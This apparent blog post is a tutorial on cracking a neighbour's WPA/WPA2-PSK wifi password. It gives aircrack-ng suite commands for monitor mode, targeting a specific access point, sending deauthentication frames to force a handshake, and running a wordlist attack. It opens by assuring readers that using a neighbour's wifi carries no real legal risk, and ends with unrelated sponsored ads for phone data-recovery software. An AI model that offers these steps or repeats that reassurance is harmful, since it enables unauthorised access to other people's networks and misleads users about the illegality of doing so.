First of all please understand that you are not going to land in jail just for hacking a wifi,and there is little chance(given that you are not an heavy internet surfer) that the neighbour would realise that his wifi is been used,and lets say even if he does realises ,he will only change the password (untill unless he happens to be an IT security expert) and he is definitely not going to approach the cybercrime department for such a small thing.
Here I teach you how to hack a WPA-PSK or WPA2-PSK encrypted wifi password as they are the most common ones used
The weakness in the WPA2-PSK system is that the encrypted password is shared in what is known as the 4-way handshake. When a client authenticates to the access point (AP), the client and the AP go through a 4-step process to authenticate the user to the AP. If we can grab the password at that time, we can then attempt to crack it.
Steps
1 First of all download kali linux. Aircrack ng should come pre installed if not manually install it.
Start monitor mode by typing this command airmon-ng start wlan0
Now that our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by .
Type airodump-ng mon0
This command grabs all the traffic that your wireless adapter can see and displays critical information about it, including the BSSID (the MAC address of the AP), channel, speed, encryption (if any), and finally, the ESSID (what most of us refer to as the SSID). Note down the BSSID and channel number of your target
2. Type airodump-ng --bssid [the one noted above] -c 6 --write Mypass mon0
-c 6is the channel on which your target is operating
Mypassis the file you want to write in you can choose any name of your choice
mon0is the monitoring wireless adapter
3.Open another terminal and type aireplay-ng --deauth 150 -a [BSSID] mon0
-150is the number of de-authenticate frames you want to send
In order to capture the encrypted password, we need to have the client authenticate against the AP this allows us to grab their encrypted password in the process.
After that the encrypted password has been stored in Mypass. To decrypt it type.
aircrack-ng Mypass-01.cap -w /pentest/passwords/wordlists/darkc0de Related:Group Buy SEO Tools
Where Mypass-01.cap is the name of the file we wrote to in the airodump-ng command
pentest/passwords/wordlists/darkc0deIs the location of the wordlist you wish to use I suggest you should first use the default one provided and if it does not work then move on to bigger one
5.Now you have to wait and be patient This process is relatively slow and tedious. Depending upon the length of your password list, you could be waiting a few minutes to a few days!!!
After it has been successfully cracked password will be displayed on the terminal
Here are 2 advanced wordlist in case the default one fails
Sponsor ads:
Gihosoft Free iPhone Data Recovery:iphonerecovery.com
Free iPhone Data Recovery Software for Windows/Mac
Recover up to 12+ types of files, including contacts, SMS, photos, WhatsApp, Viber, notes, etc.
Restore lost data from iOS devices directly or from iTunes and iCloud backup
Recover iPhone data lost due to iOS upgrade/jailbreak, accidental deletion, device lost or broken
Support all the latest iPhone, iPad and iPod Touch
Both Free and Pro version.
If you lost data after you updated to a new iPhone, you can always use Gihosoft iPhone Data Recovery to get the data back from the old iPhone or backup.
Worth reading:download youtube 1080p
If you use android phones, please choose Gihosoft Android Data Recovery
Jihosoft Android Data Recovery: the best Android Data Recovery software for Windows and Mac to recover deleted contacts, messages, photos, videos, WhatsApp and etc from Android
No comments:
Post a Comment